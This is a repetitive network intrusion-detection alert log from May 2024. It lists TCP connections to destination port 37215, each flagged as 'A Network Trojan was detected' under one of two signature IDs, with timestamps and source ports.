            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.351816
            SID:2829579
            Source Port:45050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064950
            SID:2835222
            Source Port:47502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065189
            SID:2829579
            Source Port:58158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.580587
            SID:2829579
            Source Port:59534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854909
            SID:2829579
            Source Port:57592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470342
            SID:2829579
            Source Port:35758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038950
            SID:2835222
            Source Port:51438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.585061
            SID:2829579
            Source Port:42310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737160
            SID:2829579
            Source Port:54486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668930
            SID:2835222
            Source Port:54626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855672
            SID:2835222
            Source Port:43062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914202
            SID:2829579
            Source Port:53148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273477
            SID:2835222
            Source Port:54304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043184
            SID:2829579
            Source Port:55976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.969302
            SID:2835222
            Source Port:33526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843088
            SID:2829579
            Source Port:35410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709589
            SID:2829579
            Source Port:39396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858574
            SID:2835222
            Source Port:51856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.133997
            SID:2829579
            Source Port:39018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956584
            SID:2829579
            Source Port:55768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.935163
            SID:2835222
            Source Port:37214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.901618
            SID:2829579
            Source Port:43436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555348
            SID:2835222
            Source Port:44260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.409431
            SID:2835222
            Source Port:46478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304173
            SID:2835222
            Source Port:57300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805416
            SID:2835222
            Source Port:45962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.563840
            SID:2829579
            Source Port:50662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953360
            SID:2829579
            Source Port:48094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996108
            SID:2829579
            Source Port:35206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.948308
            SID:2829579
            Source Port:45510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.211716
            SID:2829579
            Source Port:55392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298695
            SID:2829579
            Source Port:36778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979443
            SID:2835222
            Source Port:38974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.476073
            SID:2835222
            Source Port:33190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936998
            SID:2829579
            Source Port:56728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601794
            SID:2835222
            Source Port:38260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808334
            SID:2829579
            Source Port:60930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931043
            SID:2829579
            Source Port:59194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060022
            SID:2835222
            Source Port:41036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559410
            SID:2829579
            Source Port:37506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873275
            SID:2835222
            Source Port:55688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922554
            SID:2829579
            Source Port:46812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469822
            SID:2835222
            Source Port:56998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999352
            SID:2829579
            Source Port:50204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617444
            SID:2835222
            Source Port:44106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.646237
            SID:2835222
            Source Port:42798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809995
            SID:2835222
            Source Port:58190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858431
            SID:2829579
            Source Port:35278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299200
            SID:2829579
            Source Port:44572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030910
            SID:2829579
            Source Port:33322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943764
            SID:2835222
            Source Port:42550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748115
            SID:2835222
            Source Port:49504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775504
            SID:2829579
            Source Port:44430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860758
            SID:2835222
            Source Port:34940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994005
            SID:2829579
            Source Port:56340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058775
            SID:2829579
            Source Port:56644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543168
            SID:2835222
            Source Port:38678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.660840
            SID:2835222
            Source Port:47888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.299953
            SID:2829579
            Source Port:51958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988753
            SID:2829579
            Source Port:57818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846979
            SID:2829579
            Source Port:48078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309190
            SID:2835222
            Source Port:46450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.041518
            SID:2835222
            Source Port:57602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003084
            SID:2835222
            Source Port:44092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877648
            SID:2829579
            Source Port:36754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864309
            SID:2835222
            Source Port:49016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780007
            SID:2835222
            Source Port:44784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928178
            SID:2835222
            Source Port:39184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804870
            SID:2835222
            Source Port:57338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605070
            SID:2835222
            Source Port:45930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909930
            SID:2835222
            Source Port:40022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654731
            SID:2835222
            Source Port:35870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840272
            SID:2835222
            Source Port:52970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697373
            SID:2829579
            Source Port:51822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380308
            SID:2829579
            Source Port:56582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054942
            SID:2835222
            Source Port:37960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842114
            SID:2829579
            Source Port:50876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915016
            SID:2829579
            Source Port:57592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756014
            SID:2829579
            Source Port:36002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912124
            SID:2835222
            Source Port:52806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299262
            SID:2835222
            Source Port:53106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860470
            SID:2829579
            Source Port:48698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777589
            SID:2829579
            Source Port:45174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965746
            SID:2835222
            Source Port:36910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.054014
            SID:2835222
            Source Port:49808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.322177
            SID:2829579
            Source Port:46052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001443
            SID:2835222
            Source Port:39972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.918722
            SID:2829579
            Source Port:57882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.910102
            SID:2829579
            Source Port:48402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746113
            SID:2829579
            Source Port:50964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470141
            SID:2835222
            Source Port:54432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299991
            SID:2829579
            Source Port:54746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945205
            SID:2835222
            Source Port:42220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039637
            SID:2829579
            Source Port:48948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780020
            SID:2835222
            Source Port:59672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933087
            SID:2829579
            Source Port:48476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.463493
            SID:2829579
            Source Port:45018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004635
            SID:2835222
            Source Port:55408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.812399
            SID:2829579
            Source Port:47876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696686
            SID:2835222
            Source Port:59872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182207
            SID:2835222
            Source Port:33440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864971
            SID:2829579
            Source Port:44194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996411
            SID:2829579
            Source Port:37472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.073094
            SID:2829579
            Source Port:33326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.889016
            SID:2829579
            Source Port:47508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421664
            SID:2829579
            Source Port:38844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737905
            SID:2829579
            Source Port:38162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543158
            SID:2829579
            Source Port:49998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665852
            SID:2829579
            Source Port:50538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533116
            SID:2835222
            Source Port:51838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881238
            SID:2829579
            Source Port:49166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.905111
            SID:2835222
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778465
            SID:2835222
            Source Port:39364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.732685
            SID:2829579
            Source Port:57160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654503
            SID:2835222
            Source Port:53858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679938
            SID:2829579
            Source Port:45640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537282
            SID:2829579
            Source Port:58762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919426
            SID:2829579
            Source Port:33696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.815698
            SID:2829579
            Source Port:56352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765648
            SID:2835222
            Source Port:41252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756565
            SID:2829579
            Source Port:57146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963503
            SID:2835222
            Source Port:34284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052536
            SID:2835222
            Source Port:55576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.618251
            SID:2835222
            Source Port:43746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045130
            SID:2835222
            Source Port:45212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.848471
            SID:2829579
            Source Port:35764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777510
            SID:2829579
            Source Port:53970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956381
            SID:2835222
            Source Port:52316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002214
            SID:2829579
            Source Port:33066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290630
            SID:2829579
            Source Port:36566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033383
            SID:2835222
            Source Port:35360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048090
            SID:2835222
            Source Port:51026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533671
            SID:2829579
            Source Port:53036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910091
            SID:2835222
            Source Port:59236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555426
            SID:2829579
            Source Port:48340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533713
            SID:2829579
            Source Port:37638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923341
            SID:2835222
            Source Port:35430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604440
            SID:2835222
            Source Port:57818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880330
            SID:2835222
            Source Port:52770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565236
            SID:2829579
            Source Port:53940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.860608
            SID:2835222
            Source Port:58254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.914018
            SID:2829579
            Source Port:45486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020219
            SID:2829579
            Source Port:34266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060949
            SID:2835222
            Source Port:50868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575129
            SID:2829579
            Source Port:56912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.307167
            SID:2835222
            Source Port:48938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026565
            SID:2829579
            Source Port:58510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371287
            SID:2835222
            Source Port:49996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853313
            SID:2835222
            Source Port:39608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540213
            SID:2829579
            Source Port:34808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870178
            SID:2835222
            Source Port:52774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482621
            SID:2829579
            Source Port:50756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040055
            SID:2829579
            Source Port:41664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020069
            SID:2829579
            Source Port:38002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450892
            SID:2829579
            Source Port:44558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541930
            SID:2835222
            Source Port:36636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506675
            SID:2835222
            Source Port:42140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869073
            SID:2835222
            Source Port:38110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893305
            SID:2829579
            Source Port:40688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.940776
            SID:2835222
            Source Port:48128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471282
            SID:2835222
            Source Port:52874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039318
            SID:2835222
            Source Port:42398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956163
            SID:2829579
            Source Port:49964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775624
            SID:2835222
            Source Port:44038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.872158
            SID:2835222
            Source Port:49632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815696
            SID:2829579
            Source Port:36420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821512
            SID:2829579
            Source Port:46244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326330
            SID:2835222
            Source Port:56462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968018
            SID:2829579
            Source Port:55690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862915
            SID:2835222
            Source Port:37142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909292
            SID:2835222
            Source Port:40620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857514
            SID:2835222
            Source Port:47538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745049
            SID:2829579
            Source Port:46902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.908418
            SID:2835222
            Source Port:43918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.333007
            SID:2829579
            Source Port:44560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919659
            SID:2835222
            Source Port:37686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308746
            SID:2835222
            Source Port:51842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.612639
            SID:2829579
            Source Port:38268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731177
            SID:2835222
            Source Port:45762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987174
            SID:2835222
            Source Port:40092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952603
            SID:2829579
            Source Port:60080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760033
            SID:2829579
            Source Port:58266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972457
            SID:2835222
            Source Port:48708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777533
            SID:2835222
            Source Port:60286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290570
            SID:2829579
            Source Port:59230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893180
            SID:2835222
            Source Port:53928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644138
            SID:2829579
            Source Port:38808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307453
            SID:2835222
            Source Port:37872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553243
            SID:2829579
            Source Port:46254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878846
            SID:2829579
            Source Port:55970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994059
            SID:2829579
            Source Port:33292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.602090
            SID:2835222
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.861149
            SID:2829579
            Source Port:54624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.794042
            SID:2835222
            Source Port:59620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.342070
            SID:2829579
            Source Port:35910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767450
            SID:2835222
            Source Port:48890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.520768
            SID:2835222
            Source Port:40290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
